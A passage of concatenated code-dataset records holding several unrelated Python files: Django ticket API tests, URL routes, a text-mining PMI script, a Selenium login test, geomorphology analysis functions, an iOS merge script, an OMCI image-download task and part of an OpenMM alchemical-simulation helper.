NAMESPACE='smc_namespace')\n @patch('documents.utils.upload_doc')\n @with_fake_docs(count=8)\n def test_approve_authorization_smc_request(self, upload_doc, docs):\n upload_doc.return_value = True\n ticket, _ = self.setup_manual_action()\n self.assertUpdateRequestFromSMC(ticket, \"approve\", \"a comment\", docs[1:4], AuthorizationRequest.Status.APPROVED)\n self.assertEqual(upload_doc.call_count, 3)\n doc_names = [doc.name for doc in docs[1:4]]\n for call in upload_doc.call_args_list:\n # call == ((doc, s3, bucket, file_path), ())\n self.assertEqual(len(call[0]), 4)\n self.assertIn(call[0][0].name, doc_names)\n self.assertEqual(call[0][2], get_ticket_bucket(ticket))\n # false after approval because update has to be done in SML\n self.assertFalse(ticket.close_conditions[2]['complete'])\n\n @with_test_modules\n @override_settings(STACK_IS_SML=True)\n @with_fake_docs(count=3)\n def test_deny_authorization_request(self, docs):\n ticket, _ = self.setup_manual_action()\n self.assertUpdateRequest(ticket, \"deny\", \"denied comment\", AuthorizationRequest.Status.DENIED, 'origin', docs)\n self.assertFalse(ticket.close_conditions[2]['complete'])\n\n # Check there is a new log entry with the negative resolution\n logs = TicketLog.objects.filter(ticket=ticket)\n self.assertEqual(len(logs), 1)\n self.assertEqual(logs.first().meta['description'], Rule.ActionDescription.AUTHORIZATION)\n self.assertEqual(logs.first().meta['status'], AuthorizationRequest.Status.DENIED)\n self.assertEqual(logs.first().meta['comment'], \"denied comment\")\n self.assertEqual(logs.first().documents.count(), 3)\n\n @with_test_modules\n @override_settings(STACK_IS_SML=False, BROKER_URL='smc_broker', NAMESPACE='smc_namespace')\n def test_deny_authorization_smc_request(self):\n ticket, _ = self.setup_manual_action()\n self.assertUpdateRequestFromSMC(ticket, \"deny\", \"denied comment\", [], AuthorizationRequest.Status.DENIED)\n self.assertFalse(ticket.close_conditions[2]['complete'])\n\n @with_test_modules\n def test_list_logs(self):\n response = self.client_get(self.api_url(self.tickets[0].pk, \"log\"))\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"count\"], self.tickets[0].logs.count())\n\n @with_test_modules\n def test_read_log(self):\n response = self.client_get(self.api_url(\n self.tickets[0].pk,\n \"log\",\n self.tickets[0].logs.first().pk,\n ))\n self.assertResponseOk(response)\n self.assertEqual(response.data[\"id\"], self.tickets[0].logs.first().pk)\n\n @with_test_modules\n @with_fake_docs(count=5)\n def test_create_log(self, docs):\n ticket = self.tickets[0]\n\n with self.subTest(\"without documents\"):\n response = self.client_post(\n self.api_url(self.tickets[0].pk, \"log\"),\n {\"message\": \"Test without documents\"},\n )\n self.assertResponseOk(response)\n log = TicketLog.objects.filter(ticket=ticket).first()\n self.assertNotEqual(log, None)\n self.assertEqual(response.data[\"id\"], log.pk)\n self.assertEqual(log.documents.count(), 0)\n\n with self.subTest(\"with documents\"):\n response = self.client_post(\n self.api_url(self.tickets[0].pk, \"log\"),\n {\n **{doc.name: doc.file for doc in docs[0:3]},\n \"message\": \"Test with documents\",\n },\n format='multipart'\n )\n self.assertResponseOk(response)\n log = TicketLog.objects.filter(ticket=ticket).first()\n self.assertIsNotNone(log)\n self.assertEqual(response.data[\"id\"], log.pk)\n self.assertEqual(log.documents.count(), 3)\n\n @with_test_modules\n def test_read_all_authorization_requests(self):\n auth_requests = [\n AuthorizationRequest.objects.create(\n id=f'random_id-{secrets.token_urlsafe(8)}',\n ticket=self.tickets[0],\n authorization='ticket.A.close.authorization.authority-3',\n origin='origin'\n ),\n AuthorizationRequest.objects.create(\n id=f'random_id-{secrets.token_urlsafe(8)}',\n ticket=self.tickets[1],\n authorization='ticket.B.archive.authorization.miner-1',\n origin='origin'\n ),\n AuthorizationRequest.objects.create(\n id=f'random_id-{secrets.token_urlsafe(8)}',\n ticket=self.tickets[2],\n authorization='ticket.A.escalate.authorization.authority-2',\n origin='origin'\n )\n ]\n response = self.client_get(f'/api/{self.api_version}/ticket-requests/')\n self.assertResponseOk(response)\n self.assertEqual(len(response.data[\"results\"]), len(auth_requests))\n","sub_path":"tranque_v1.5.1_source/backend-v1.5.1/src/api/v1/tests/alert/test_ticket_views.py","file_name":"test_ticket_views.py","file_ext":"py","file_size_in_byte":26458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"639446428","text":"from django.conf.urls import url\n# Deprecated\nfrom annotation_app import views_deprecated\n\n\n### Subjects URLs\nurlpatterns = [\n\n url(r'^$', views_deprecated.subject_list, name='subjects'),\n url(r'^get_subject_list/$', views_deprecated.get_subject_list, name='get_subject_list'),\n url(r'^get_subject_bills/$', views_deprecated.get_subject_bills,\n name='get_subject_bills'),\n url(r'^(?P\\d+)/$', views_deprecated.subject, name='subject'),\n]\n","sub_path":"annotation_app/routes/subjects_routes.py","file_name":"subjects_routes.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"115642585","text":"import pandas as pd\nimport numpy as np\nimport math\nfrom pyhanlp import *\n\n\ndef read_file(filename):\n f = open(filename)\n words = []\n for l in f:\n words.append(l.strip())\n f.close()\n return words\n\n\ndef collect_stats(filename):\n result_df = pd.read_csv(filename)\n valid_titles = result_df[result_df['标题'] != \"[]\"]['标题']\n valid_titles.to_csv('intermediate_data/all_titles.csv')\n print('Entry count:')\n print('\\tTotal: {}'.format(result_df.shape[0]))\n print('\\tValid: {}'.format(valid_titles.shape[0]))\n\n stopwords_path = 'hit_stopwords.txt'\n stopwords = read_file(stopwords_path)\n print('Stopword count:')\n print('\\tTotal: {}'.format(len(stopwords)))\n\n TermFrequency = JClass('com.hankcs.hanlp.corpus.occurrence.TermFrequency')\n TermFrequencyCounter = JClass('com.hankcs.hanlp.mining.word.TermFrequencyCounter')\n counter = TermFrequencyCounter()\n for title in valid_titles:\n counter.add(title)\n print('Word count (in the entries):')\n total_word_count = counter.size()\n print('\\tTotal: {}'.format(total_word_count))\n\n freq_dict = {}\n for termFreq in counter:\n if termFreq.getTerm() not in stopwords:\n freq_dict[termFreq.getTerm()] = termFreq.getFrequency()\n df = pd.DataFrame.from_dict(freq_dict, orient='index', columns=['Frequency']).sort_values(by=\"Frequency\", ascending=False)\n df.to_csv('intermediate_data/word_freq.csv')\n print('\\tValid: {}'.format(df.shape[0]))\n\n single_count = df[df['Frequency'] == 1].shape[0]\n threshold = (-1 + math.sqrt(1 + 8 * single_count)) / 2\n print(\"Frequency threshold:\")\n print(\"\\tValue: {}\".format(threshold))\n\n high_freq_df = df[df['Frequency'] >= threshold]\n\n hf_words = high_freq_df.index.values\n filepath = \"intermediate_data/high_freq_words.txt\"\n f = open(filepath, \"w\")\n for hf_word in hf_words:\n f.write(hf_word + '\\n')\n f.close()\n\n print('Categorized word count:')\n print('\\tHigh frequency: {}'.format(high_freq_df.shape[0]))\n print('High frequency words have been written to {}'.format(filepath))\n\n\ndef check_combined_freq(word1, word2, all_titles):\n count = 0\n for title in all_titles:\n if word1 in title and word2 in title:\n count += 1\n return count\n\n\ndef pmi(word1, word2, word_freq, total_word_count, all_titles):\n p_word1 = float(word_freq.loc[word1] / total_word_count)\n p_word2 = float(word_freq.loc[word2] / total_word_count)\n p_word12 = float(check_combined_freq(word1, word2, all_titles) / total_word_count)\n\n val = float(p_word12 / (p_word1 * p_word2))\n if val != 0:\n return math.log(val, 2)\n return 0\n\n\ndef so_pmi(word, pwords, nwords, word_freq, total_word_count, all_titles):\n pmi1 = 0\n for pword in pwords:\n pmi1 += pmi(word, pword, word_freq, total_word_count, all_titles)\n pmi2 = 0\n for nword in nwords:\n pmi2 += pmi(word, nword, word_freq, total_word_count, all_titles)\n return pmi1 - pmi2\n\n\ndef output_so_pmi():\n nwords = read_file('categories/negative.txt')\n pwords = read_file('categories/positive.txt')\n neutral_words = read_file('categories/neutral.txt')\n\n word_freq = pd.read_csv('intermediate_data/word_freq.csv', index_col=0)\n all_titles = pd.read_csv('intermediate_data/all_titles.csv')['标题']\n total_word_count = word_freq['Frequency'].sum()\n print('Total word count: {}'.format(total_word_count))\n so_pmi_dict = {}\n for word in neutral_words:\n val = so_pmi(word, pwords, nwords, word_freq, total_word_count, all_titles)\n so_pmi_dict[word] = val\n # val = so_pmi('今天', pwords, nwords, word_freq, total_word_count, all_titles)\n # so_pmi_dict['今天'] = val\n print(so_pmi_dict)\n\n so_pmi_df = pd.DataFrame.from_dict(data=so_pmi_dict, orient='index')\n so_pmi_df.to_csv('intermediate_data/sopmi.csv')\n\n\nif __name__ == '__main__':\n # collect_stats('result.csv')\n # output_so_pmi()\n print(\"zzz\")","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"279991095","text":"# -*- coding: utf-8 -*-\nimport unittest\nfrom src.functions.Functions import Functions\nfrom src.parts.Login import Login \nfrom src.parts.Menu import Menu\n\nimport allure\n\n\n@allure.feature(u'Login Oldelval')\n@allure.story(u'008: Loguearse exitosamente en la aplicación')\n@allure.testcase(u\"Caso de Prueba 008\", u'http://my.tms.org/browse/TESTCASE-39')\n@allure.severity(allure.severity_level.NORMAL)\n@allure.description(u\"\"\"El Usuario se loguea en la aplicación:\n-- Ingresa a pantralla de inicio. \n-- Ingresa un usuario valido. \n-- Ingresa una contraseña correcta. \n\"\"\")\nclass tst_008(unittest.TestCase,Login, Menu, Functions):\n\n def setUp(self):\n with allure.step(u'Ingresar a la aplicación'):\n self.driver = self.abrir_Navegador(\"http://oldelval.practia.global/\")\n self.User = self.LeerCelda('A1')\n self.Password = self.LeerCelda('B1')\n\n def test_008(self):\n with allure.step(u\"Se loguea en la aplicacion\"):\n self.Login_app()\n \n with allure.step(u\"Ductos E ingresos ------> Punto de Ingreso\"):\n self.Menu_DuctosEInstalaciones_PuntoDeIngreso()\n \n \n def tearDown(self):\n self.driver.quit()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"TestAutomation/src/tests/tst_008.py","file_name":"tst_008.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"545784981","text":"import dem as d\nimport csv\nimport numpy as np\nimport matplotlib.pylab as plt\n\ndef read_csv(filename):\n with open(filename, 'rb') as f:\n reader = csv.reader(f)\n return list(reader)\n \ndef best_ksn(ksi, scaled_relief, xo = 500):\n \n A = np.vstack([ksi-np.ones(len(ksi))*float(xo)]).T \n return np.linalg.lstsq(A, scaled_relief)\n\ndef best_chi_ksn(chi, scaled_relief, xo = 500):\n \n A = np.vstack([chi]).T\n return np.linalg.lstsq(A, scaled_relief)\n\ndef best_ks_and_theta_with_wrss(elevation, flow_direction, area, outlet, xo = 500):\n \n import scipy.optimize\n chi_ks = lambda theta: best_ks_with_wrss(elevation, flow_direction, area, theta, outlet, xo)[1]\n if len(chi_ks(0.5)) == 0:\n return (0, 0, 0)\n xopt = scipy.optimize.fmin(func=chi_ks, x0=np.array([0.5]))\n (m, WRSS) = best_ks_with_wrss(elevation, flow_direction, area, xopt[0], outlet, xo)\n SS = uninformative_SS(elevation, flow_direction, area, outlet, xopt[0], xo)\n \n return (m, xopt[0], 1 - (WRSS / SS))\n \ndef best_ks_and_theta_with_clip(elevation, flow_direction, area, outlet, area_measured, xo = 500, pixel_radius = 5):\n \n bounds = flow_direction.bounds_of_basin_for_outlet(outlet);\n elev_clip = elevation.clip_to_bounds(bounds)\n area_clip = area.clip_to_bounds(bounds)\n fd_clip = flow_direction.clip_to_bounds(bounds)\n outlet_xy = (outlet[1], outlet[0])\n locations_snap = area_clip.snap_locations_to_closest_value((outlet_xy, ), (area_measured, ), pixel_radius = pixel_radius)\n return best_ks_and_theta_with_wrss(elev_clip, fd_clip, area_clip, locations_snap, xo)\n\ndef best_ks_with_wrss(elevation, flow_direction, area, theta, outlet, xo = 500):\n \n chi = d.GeographicChi(area = area, flow_direction = flow_direction, theta = theta, outlets = (outlet[0], ), Ao = np.power(xo,2))\n valid_indexes = np.where((chi._griddata != np.NAN) & (elevation._griddata != np.NAN) & (chi._griddata != 0.0))\n outlet_rowscols = flow_direction._xy_to_rowscols((outlet[0], ))[0]\n base_elevation = elevation[outlet_rowscols[0], outlet_rowscols[1]]\n sol = best_chi_ksn(chi._griddata[valid_indexes], elevation._griddata[valid_indexes]-base_elevation)\n m = sol[0]\n WRSS = sol[1] \n \n return (m, WRSS)\n\ndef uninformative_SS(elevation, flow_direction, area, outlet, theta, xo = 500):\n \n chi = d.GeographicChi(area = area, flow_direction = flow_direction, theta = theta, outlets = (outlet[0], ), Ao = np.power(xo,2))\n valid_indexes = np.where((chi._griddata != np.NAN) & (elevation._griddata != np.NAN) & (chi._griddata != 0.0))\n mean_elevation = np.mean(elevation._griddata[valid_indexes])\n return np.sum(np.power(elevation._griddata[valid_indexes]-mean_elevation, 2))\n \ndef find_ksi_scaled_relief(lat, lon, area, ksi, relief, d8, A_measured, pixel_radius = 5):\n \n index = area._xy_to_rowscols(((lon,lat),))[0]\n if index[0] is None:\n return None, None, None\n #row, col = area.find_nearest_cell_with_value(index, A_measured, pixel_radius)\n A_calculated = area[index[0], index[1]]\n indexes_of_area = d8.get_indexes_of_upstream_cells(index[0], index[1])\n ksi_values = list()\n relief_values = list()\n for (row, col) in indexes_of_area:\n if ksi[row,col] is None or relief[row,col] is None or np.isnan(ksi[row, col]) or np.isnan(relief[row,col]):\n return None, None, None\n ksi_values.append(ksi[row,col])\n relief_values.append(relief[row,col])\n return ksi_values, relief_values, A_calculated\n \ndef calculate_ksn_for_data(data, Ao = 250000, theta = 0.5):\n \n import sys\n sys.setrecursionlimit(1000000)\n \n pixel_radius = 5\n reject_fraction = 0.1\n \n prefixes = ['af', 'as', 'au', 'ca', 'eu', 'na', 'sa']\n lats = list()\n lons = list()\n areas = list()\n for sample_name, lat, lon, dr, dr_sig, a in data:\n lats.append(float(lat))\n lons.append(float(lon))\n areas.append(float(a)*1.0E6)\n \n locations = zip(lons,lats)\n ksn_vec = np.zeros(len(areas), dtype = np.float64)\n a_calc_vec = np.zeros(len(areas), dtype = np.float64)\n \n for prefix in prefixes:\n print('Loading prefix: ' + prefix)\n area = d.GeographicArea.load(prefix + '_area')\n #ksi = d.GeographicKsi.load(prefix + '_ksi_' + suffix)\n #relief = d.ScaledRelief.load(prefix + '_relief_' + suffix)\n d8 = d.FlowDirectionD8.load(prefix + '_flow_direction')\n elevation = d.Elevation.load(prefix + '_elevation')\n print('Done loading prefix: ' + prefix)\n counter = 0\n xo = np.mean(d8._mean_pixel_dimension(flow_direction = d8) * d8.pixel_scale())\n locs = tuple()\n areas_for_valid_points = tuple()\n for (lon, lat), area_m in zip(locations, areas):\n if elevation.location_in_grid((lon, lat)) and area_m > 5.0*Ao:\n locs = locs + ((counter, (lon, lat)),)\n areas_for_valid_points = areas_for_valid_points + (area_m, )\n counter = counter + 1\n counter = tuple([el[0] for el in locs]);\n locat = tuple([el[1] for el in locs]);\n locations_snap = area.snap_locations_to_closest_value(locat, areas_for_valid_points, pixel_radius = pixel_radius)\n locations_snap_indexes = area._xy_to_rowscols(locations_snap)\n dem_derived_areas = [area[i,j] for (i,j) in locations_snap_indexes]\n for (lon, lat), target_area, measured_area in zip(locat, areas_for_valid_points, dem_derived_areas):\n print('Longitude: ' + str(lon) + '; Latitude: ' + str(lat) + '; target area: ' + str(target_area) + '; measured area: ' + str(measured_area) + '; fractional difference: ' + str(np.abs(measured_area - target_area)/target_area))\n\n fraction_difference = [np.abs(derived_area - measured_area) / measured_area for (derived_area, measured_area) in zip(dem_derived_areas, areas_for_valid_points)]\n chi = d.GeographicChi(area = area, flow_direction = d8, theta = theta, Ao = Ao, outlets = (locations_snap[0],))\n scaled_relief = d.ChiScaledRelief(elevation = elevation, flow_direction = d8, theta = theta, Ao = Ao, outlets = (locations_snap[0],)) \n first_element = True\n \n print('Ao=')\n print(Ao)\n \n for (lon, lat), areas_m, counter_v, areas_dem, sample_fraction_difference in zip(locations_snap, areas_for_valid_points, counter, dem_derived_areas, fraction_difference):\n if first_element:\n first_element = False\n else:\n chi._create_from_inputs(area = area, flow_direction = d8, theta = theta, Ao = Ao, outlets = ((lon, lat),))\n scaled_relief._create_from_inputs(elevation = elevation, flow_direction = d8, theta = theta, Ao = Ao, outlets = ((lon, lat),)) \n chi_vec, scaled_relief_vec, a_calc = find_ksi_scaled_relief(lat, lon, area, chi, scaled_relief, d8, area_m, pixel_radius)\n plt.plot(chi_vec, scaled_relief_vec, 'k.')\n plt.show()\n \n if chi_vec is not None and sample_fraction_difference < reject_fraction:\n best_fit, residuals, rank, s = best_chi_ksn(chi_vec, scaled_relief_vec)\n best_ks = best_fit[0]\n ksn_vec[counter_v] = best_ks\n a_calc_vec[counter_v] = a_calc\n print('lat = {0}, long = {1}, ksn = {2}, np = {3}, reported area = {4}, measured area = {5}, np/4 = {6}'.format(lat,lon,best_ks, len(chi_vec), areas_m/1.0E6, areas_dem/1.0E6, len(chi_vec)/4))\n \n area = None\n d8 = None\n elevation = None\n \n return ksn_vec, a_calc_vec\n\n\ndef extract_all_ksi_relief_values_for_position(position, d8, area, ksi, relief, Ao, mask=None, A_cutoff = None):\n (row, col) = area._xy_to_rowscols((position, ))[0]\n \n indexes_of_area = d8.get_indexes_of_upstream_cells(row, col)\n ksi_values = list()\n relief_values = list()\n if A_cutoff is None:\n A_cutoff = Ao\n for (row, col) in indexes_of_area:\n if ksi[row,col] is None or relief[row,col] is None or np.isnan(ksi[row, col]) or np.isnan(relief[row,col]):\n return None, None, None\n if area[row, col] >= A_cutoff:\n if mask is None:\n ksi_values.append(ksi[row,col])\n relief_values.append(relief[row,col])\n elif mask[row, col] == 1:\n ksi_values.append(ksi[row,col])\n relief_values.append(relief[row,col])\n return ksi_values, relief_values\n\ndef create_chi_grid_for_geographic_prefix(prefix, thetas, Ao, basin_lengths):\n \n area = d.GeographicArea.load(prefix + \"_area\")\n d8 = d.FlowDirectionD8.load(prefix + \"_flow_direction\")\n flow_length = d.GeographicFlowLength.load(prefix + \"_flow_length\")\n elevation = d.Elevation.load(prefix + \"_elevation\")\n for theta in thetas:\n for basin_length in basin_lengths:\n chi = d.GeographicChi(area = area, flow_direction=d8, flow_length=flow_length, theta=theta, Ao=Ao, basin_length=basin_length)\n chi.save(prefix + '_chi_' + str(basin_length) + '_' + str(theta).replace('.', '_') + '_' + str(Ao))\n chi = None\n relief = d.ChiScaledRelief(elevation = elevation, area = area, flow_direction=d8, flow_length=flow_length, theta=theta, Ao=Ao, basin_length=basin_length)\n relief.save(prefix + '_relief_' + str(basin_length) + '_' + str(theta).replace('.', '_') + '_' + str(Ao))\n relief = None\n \ndef calculate_ks_for_sample(v, d8, ksi, relief, area, Ao = 250000, mask = None, xo = None, A_cutoff = None):\n \n ks = list()\n if xo is None:\n xo = np.mean(d8._mean_pixel_dimension(flow_direction = d8) * d8.pixel_scale())\n for position in v:\n ksi_values, relief_values = extract_all_ksi_relief_values_for_position(position, d8, area, ksi, relief, Ao, mask, A_cutoff=A_cutoff)\n from matplotlib import pyplot as plt\n try:\n best_fit, residuals, rank, s = best_chi_ksn(ksi_values, relief_values, xo)\n best_ks = best_fit[0] \n model_residuals = residuals[0] \n relief_array = np.array(relief_values)\n relief_mean = np.mean(relief_array)\n total_residuals = np.sum((relief_array - relief_mean)**2)\n R2 = 1 - model_residuals / total_residuals \n except:\n best_ks = 0\n R2 = 0 \n ks.append((best_ks, R2))\n\n return ks\n\ndef plot_relief_and_ksi(v, d8, ksi, relief, area, Ao = 250000, mask = None):\n from matplotlib import pyplot as plt\n for position in v:\n ksi_values, relief_values = extract_all_ksi_relief_values_for_position(position, d8, area, ksi, relief, Ao, mask = mask)\n plt.figure()\n plt.plot(ksi_values, relief_values, 'k.', rasterized = True)\n\n\ndef calculate_slope_fraction_for_sample(v, d8, area, slope, cutoff = 0.2):\n \n fraction = list()\n \n for position in v:\n \n (row, col) = area._xy_to_rowscols((position, ))[0]\n \n indexes_of_area = d8.get_indexes_of_upstream_cells(row, col)\n total_number_of_points_in_basin = len(indexes_of_area)\n number_of_points_in_basin_above_cutoff = 0\n for (row, col) in indexes_of_area:\n print(slope[row,col])\n if slope[row,col] > cutoff:\n number_of_points_in_basin_above_cutoff += 1\n \n fraction.append(number_of_points_in_basin_above_cutoff / total_number_of_points_in_basin)\n\n return fraction\n\ndef plot_stock_and_montgomery():\n \n K = {'granitoids': (4.4e-7, 4.3e-6),\n 'volcaniclastics': (4.8e-5, 3.0e-4),\n 'mudstones': (4.7e-4, 7.0e-3),\n 'basalt': (3.8e-6, 7.3e-6)}\n \n colors = {'granitoids': 'r-',\n 'volcaniclastics': 'b-',\n 'mudstones': 'g-',\n 'basalt': 'm-'}\n \n from matplotlib import pyplot as plt\n \n for key in K.keys():\n \n U = (1e-4, 1e1)\n ks = (U[0] / 1000.0 / K[key][0], U[1] / 1000.0 / K[key][0])\n plt.plot(U,ks,colors[key])\n ks = (U[0] / 1000.0 / K[key][1], U[1] / 1000.0 / K[key][1])\n plt.plot(U,ks,colors[key])\n\n \n\n \n","sub_path":"GradientSamples/bin/denudationRateAnalysis.py","file_name":"denudationRateAnalysis.py","file_ext":"py","file_size_in_byte":12227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"33241103","text":"__author__ = 'jianzhong'\nimport youthSetting as YSetting\nimport FileUtils as Util\nimport RegexUtil as regexUtil\nimport sys\nimport re\nimport os\n\n#main method enter\n\n\n#all replace action was execute at here\ndef replaceAllString():\n Util.replaceOstrWithNstr(YSetting.DNS,YSetting.YOUTHDNS)\n Util.replaceOstrWithNstr(YSetting.ctripBaoLeiIP,YSetting.youthBaoLeiIP)\n Util.replaceOstrWithNstr(YSetting.ctripPaymentIP,YSetting.youthPaymentIP)\n Util.replaceOstrWithNstr(\"ctrip://\",\"ctripyouth://\")\n regexUtil.replaceFileStrWithRegex('(\\s)*__dataSource.systemCode_\\s=\\s@\"[0-9]*;','__dataSource.systemCode_ = @\"12\";','AppDelegate.m')\n regexUtil.replaceFileStrWithRegex('(\\s)*#define kUBTAppID @\"481001\"','#define kUBTAppID @\"481001\"\\n#define kCrittercismAppId @\"538738311acb715292000001\"','config.h')\n regexUtil.replaceFileStrWithRegex('(\\s)*\\[self\\s*initDataSource\\];','[self initDataSource];\\n[Crittercism enableWithAppID:kCrittercismAppId];','AppDelegate.m')#63\n regexUtil.replaceFileStrWithRegex('(\\s)*\\[self\\s*reloadRootViewControllers\\];','[self reloadRootViewControllers];\\n[[CTLocationManager sharedLocationManager] startLocatingWithDelegate:nil timeout:60 disableCache:YES needCtripCity:YES];','')#64\n regexUtil.replaceFileStrWithRegex('NSString\\*\\s*scheme\\s*=\\s*\\[\\[url scheme\\] lowercaseString\\];','NSString* scheme = [[url scheme] lowercaseString];\\nif([@\"ctripyouth\" isEqualToString:scheme]){\\nscheme = @\"ctrip\";\\n}','AppDelegate.m')#66\n regexUtil.replaceFileStrWithRegex('NSString\\s\\*urlStr\\s=\\s*url\\.absoluteString;','NSString *urlStr = url.absoluteString;\\nurlStr = [urlStr stringByReplacingOccurrencesOfString:@\"ctrip://\" withString:@\"ctripyouth://\"];\\n','CTDestinationURLDispatcher.m')\n regexUtil.replaceFileStrWithRegex('if\\s\\(\\[\\[URL\\.scheme\\s*lowercaseString\\]\\s*isEqualToString\\:kCtripWirelessUrlSchemeString\\]\\)','if ([[URL.scheme lowercaseString] isEqualToString:kCtripWirelessUrlSchemeString] || [[URL.scheme lowercaseString] isEqualToString:@\"ctrip\"])','CTURLDispatcher.m')\n regexUtil.replaceFileStrWithRegex('','','')\n\n#1,replace\n#2,re compile methods\n#3,move methods\n\ndef mainMethod():\n replaceAllString()\n\n\nmainMethod()","sub_path":"python/MergeCode/MergeCodeTool.py","file_name":"MergeCodeTool.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"495394208","text":"#\n# Copyright 2017 the original author or authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom task import Task\nfrom twisted.internet.defer import inlineCallbacks, TimeoutError, failure, AlreadyCalledError\nfrom twisted.internet import reactor\nfrom voltha.extensions.omci.omci_defs import ReasonCodes\nimport requests\nimport os\n\n\nclass FileDownloadTask(Task):\n name = \"Image File Download Task\"\n\n def __init__(self, omci_agent, device_id, url, local_path):\n super(FileDownloadTask, self).__init__(FileDownloadTask.name, omci_agent, device_id,\n exclusive=False,\n watchdog_timeout=45)\n self.url = url\n self.local_path = local_path\n # self.log.debug('{} running'.format(FileDownloadTask.name))\n\n def start(self):\n self.log.debug('{} running'.format(FileDownloadTask.name))\n # reactor.callLater(1, self.deferred.callback, 'device {} success downloaded {} '.format(self.device_id, self.url))\n try:\n # local_filename = url.split('/')[-1]\n dir_name = os.path.dirname(self.local_path)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n self.strobe_watchdog()\n r = requests.get(self.url, stream=True)\n\n with open(self.local_path, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n self.strobe_watchdog()\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n self.deferred.callback('device {} success downloaded {} '.format(self.device_id, self.url))\n except Exception as e:\n #self.deferred.errback(KeyError('device {} failed downloaded {} '.format(self.device_id, self.url)))\n self.deferred.errback(failure.Failure(e))\n \n def stop(self):\n self.cancel_deferred()\n super(FileDownloadTask, self).stop()\n\n","sub_path":"src/voltha/voltha/extensions/omci/tasks/file_download_task.py","file_name":"file_download_task.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"114816494","text":"\"\"\"\n\nCreated by: Nathan Starkweather\nCreated on: 02/26/2014\nCreated in: PyCharm Community Edition\n\n\n\"\"\"\n__author__ = 'Nathan Starkweather'\n\nfrom pbslib.recipemaker.tpid_recipes import *\n\nif __name__ == '__main__':\n pgains = [30 + i / 10 for i in range(0, 200, 25)]\n print(pgains)\n\n itimes = (3, 3.5, 4, 4.5, 5, 6, 7)\n\n settings = []\n for p in pgains:\n for i in itimes:\n settings.append((p, i, 0))\n\n print(len(settings))\n\n settings = [(40, i, 0) for i in (5.5, 6, 6.5, 7)]\n\n r = many_with_pumps(settings)\n f = save_recipe(r)\n from os import startfile\n startfile(f)\n","sub_path":"archive/tpid/make_tpid_recipe.py","file_name":"make_tpid_recipe.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"259636077","text":"################################################################\n# Kevin Shen, 2019 #\n# kevinshen@ucsb.edu #\n# #\n################################################################\n## Helper functions to alchemize (small, < rcut) molecules in openMM\n# Currently implemented for handling standard OMM forcefields (i.e. the standard nonbonded force; support for custom nonbonded force to come later)#\n# Strategy is as delineated here: https://github.com/choderalab/openmmtools/issues/376\n# 1) Turn of charges in standard NonbondedForce\n# 2) Add new softCoreForce to turn off LJ interaction with other particles\n# 3) Add new soluteCoulForce to turn on intramolecular electrostatics\n# 4) Add new soluteLJForce to turn on intramolecular LJ interactions\n# \n# Example Usage:\n#import alchemify\n#soluteIndices = []\n# soluteResidues = [soluteRes] #list of residues to alchemify\n# #parmed gromacs topology\n# for ir,res in enumerate(top.residues):\n# if ir in soluteResidues:\n# for atom in res.atoms:\n# soluteIndices.append(atom.idx)\n# print(\"Solute residue: {}\".format([top.residues[ir].atoms for ir in soluteResidues]))\n# print(\"Solute Indices: {}\".format(soluteIndices))\n# alch = alchemify.alchemist(system,lambdaLJ,lambdaQ)\n# alch.setupSolute(soluteIndices)\n\nimport simtk.openmm as mm\nimport simtk.openmm.app as app\nimport simtk.unit as u\nimport numpy as np\n\nclass alchemist:\n \"\"\"A helper class to manage an alchemical simulation\n Notes\n -----\n Basic usage is:\n alch = alchemist()\n alch.setupSolute(soluteIndices)\n\n\n \"\"\"\n def __init__(self,system,lambdaLJ=1.0, lambdaQ=1.0):\n \"\"\"Initialization\n Parameters\n ----------\n system : openmm system\n\n Notes\n -----\n Todo:\n 1) add type-checking\n \"\"\"\n\n self.system = system\n self.q0s = [[0]]*self.system.getNumParticles()\n self.setupFF(lambdaLJ,lambdaQ)\n self.soluteInitialized = False\n\n def setupFF(self, lambdaLJ=1.0, lambdaQ=1.0):\n \"\"\"Setup the Alchemical force fields, and store charge vector\"\"\"\n #We need to add a custom non-bonded force for the solute being alchemically changed\n #Will be helpful to have handle on non-bonded force handling LJ and coulombic interactions\n #Currently assumes only one Nonbonded force setup in the system\n NBForce = None\n for frc in self.system.getForces():\n if (isinstance(frc, mm.NonbondedForce)):\n NBForce = frc\n self.lambdaLJ = lambdaLJ\n self.lambdaQ = lambdaQ\n print(\"...alchemify: Using lambdaLJ: {}, lambdaQ: {}\".format(self.lambdaLJ,self.lambdaQ))\n \n #Define the soft-core function for turning on/off LJ interactions\n #In energy expressions for CustomNonbondedForce, r is a special variable and refers to the distance between particles\n #All other variables must be defined somewhere in the function.\n #The exception are variables like sigma1 and sigma2.\n #It is understood that a parameter will be added called 'sigma' and that the '1' and '2' are to specify the combining rule.\n softCoreFunction = '4.0*lambdaLJ*epsilon*x*(x-1.0); x = (1.0/reff_sterics);'\n 